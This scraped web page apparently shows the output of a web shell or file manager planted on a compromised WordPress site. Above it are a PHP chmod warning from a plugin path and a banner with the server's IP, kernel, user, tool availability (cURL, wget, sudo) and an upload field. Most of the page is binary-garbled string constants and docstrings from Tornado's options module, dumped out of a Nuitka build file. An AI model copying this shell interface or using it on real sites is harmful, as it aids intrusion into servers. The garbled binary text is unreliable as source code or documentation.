Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �_options�.�� �_parse_callbacks�.��
�define�.�� �show this help information�.�� �_help_callback�.��
�help���.�� �type��help��callback���.�� �replace�.�� �_��-���.�� �_normalize_name�.�� �get�.�� �_Option�.�� �value�.�� �Unrecognized option %r�.�� �set�.��
�values�.�� �name�.��
� <genexpr>�.��, �(OptionParser.__iter__.<locals>.<genexpr>�.�� �__getattr__�.�� �__setattr__�.�� �items�.��* �&too many values to unpack (expected 2)�.��O �KAn iterable of (name, value) pairs.
.. versionadded:: 3.1
�.��[ �WThe set of option-groups created by ``define``.
.. versionadded:: 3.1
�.�� �
group_name�.��* �&OptionParser.groups.<locals>.<genexpr>�.��� X� The names and values of options in a group.
Useful for copying options into Application settings::
from tornado.options import define, parse_command_line, options
define('template_path', group='application')
define('static_path', group='application')
parse_command_line()
application = Application(
handlers, **options.group_dict('application'))
.. versionadded:: 3.1
�.�� �group�.�� �opt�.��. �*OptionParser.group_dict.<locals>.<genexpr>�.��P �LThe names and values of all options.
.. versionadded:: 3.1
�.��+ �'OptionParser.as_dict.<locals>.<genexpr>�.�� �Error�.��# �Option %r already defined in %s�.��
� file_name�.�� �sys�.��
� _getframe�.�� K ��.��
�f_code�.�� �co_filename�.��
�f_back�.�� �co_name�.�� �frame�.��
� <unknown>�.�� �options_file�.�� � �.�� �default�.��% (h)h5hh�metavar��multiple�hh t�.��j Xc Defines a new command line option.
``type`` can be any of `str`, `int`, `float`, `bool`,
`~datetime.datetime`, or `~datetime.timedelta`. If no ``type``
is given but a ``default`` is, ``type`` is the type of
``default``. Otherwise, ``type`` defaults to `str`.
If ``multiple`` is True, the option value is a list of ``type``
instead of an instance of ``type``.
``help`` and ``metavar`` are used to construct the
automatically generated command line help string. The help
message is formatted like::
--name=METAVAR help string
``group`` is used to group the defined options in logical
groups. By default, command line options are grouped by the
file in which they are defined.
Command line option names must be unique globally.
If a ``callback`` is given, it will be run with the new value whenever
the option is changed. This can be used to combine command-line
and file-based options::
define("config", type=str, help="path to config file",
callback=lambda path: parse_config_file(path, final=False))
With this definition, options in the file specified by ``--config`` will
override options set earlier on the command line, but can be overridden
by later flags.
�.�� �argv�.�K.�� �
startswith�.�� h
��.�� �--�.��
�lstrip�.��
� partition�.�� �=���.��* �&too many values to unpack (expected 3)�.�� �self�.�� �
print_help�.��( �$Unrecognized command line option: %r�.�h.�� �true�.�� �Option %r requires a value�.��
�option�.�� �parse�.�� �run_parse_callbacks�.��2 X+ Parses all options given on the command line (defaults to
`sys.argv`).
Options look like ``--option=value`` and are parsed according
to their ``type``. For boolean options, ``--option`` is
equivalent to ``--option=true``
If the option has ``multiple=True``, comma-separated values
are accepted. For multi-value integer options, the syntax
``x:y`` is also accepted and equivalent to ``range(x, y)``.
Note that ``args[0]`` is ignored since it is the program name
in `sys.argv`.
We return a list of all arguments that are not parsed as options.
If ``final`` is ``False``, parse callbacks will not be run.
This is useful for applications that wish to combine configurations
from multiple sources.
�.�� �__file__�.�� �abspath�.�� �rb�.��
� __enter__�.�� �__exit__�.�� �exec_in�.�� �
native_str�.�� �read�.�� NNN��.�h7.��! �builtins��list���hU�str�����.��H �DOption %r is required to be a list of %s or a comma-separated string�.�� �__name__�.��( X! Parses and loads the config file at the given path.
The config file contains Python code that will be executed (so
it is **not safe** to use untrusted config files). Anything in
the global namespace that matches a defined option will be
used to set that option's value.
Options may either be the specified type for the option or
strings (in which case they will be parsed the same way as in
`.parse_command_line`)
Example (using the options defined in the top-level docs of
this module)::
port = 80
mysql_host = 'mydb.example.com:3306'
# Both lists and comma-separated strings are allowed for
# multiple=True.
memcache_hosts = ['cache1.example.com:11011',
'cache2.example.com:11011']
memcache_hosts = 'cache1.example.com:11011,cache2.example.com:11011'
If ``final`` is ``False``, parse callbacks will not be run.
This is useful for applications that wish to combine configurations
from multiple sources.
.. note::
`tornado.options` is primarily a command-line library.
Config file support is provided for applications that wish
to use it, but applications that prefer config files may
wish to look at other libraries instead.
.. versionchanged:: 4.1
Config files are now always interpreted as utf-8 instead of
the system default encoding.
.. versionchanged:: 4.4
The special variable ``__file__`` is available inside config
files, specifying the absolute path to the config file itself.
.. versionchanged:: 5.1
Added the ability to set options via strings in config files.
�.�� �print�.�� �Usage: %s [OPTIONS]�.�K .��
�file���.�� �
Options:
���.�� �by_group�.�� �
setdefault�.��
�append�.��
�sorted�.�� �
%s options:
�.�� �os�.�� �path�.�� �normpath�.�� �sort�.�� �<lambda>�.��- �)OptionParser.print_help.<locals>.<lambda>�.�� �key���.�h6.�h@.�h.�� �
(default %s)�.�� �textwrap�.�� �wrap�.�K,.�� �lines�.��
�insert�.�� K h4��.�� � --%-30s %s�.�� hU�slice���KNN��R�.�� �%-34s %s�.�� � �.��D �@Prints all the command line options to stderr (or another file).�.�� �exit�.��E �AAdds a parse callback, to be invoked when option parsing is done.�.��
� _Mockable�.��� X� Returns a wrapper around self that is compatible with
`mock.patch <unittest.mock.patch>`.
The `mock.patch <unittest.mock.patch>` function (included in
the standard library `unittest.mock` package since Python 3.3,
or in the third-party ``mock`` package for older versions of
Python) is incompatible with objects like ``options`` that
override ``__getattr__`` and ``__setattr__``. This function
returns an object that can be used with `mock.patch.object
<unittest.mock.patch.object>` to modify option values::
with mock.patch.object(options.mockable(), 'name', value):
assert options.name == value
�.�� �
_originals�.��"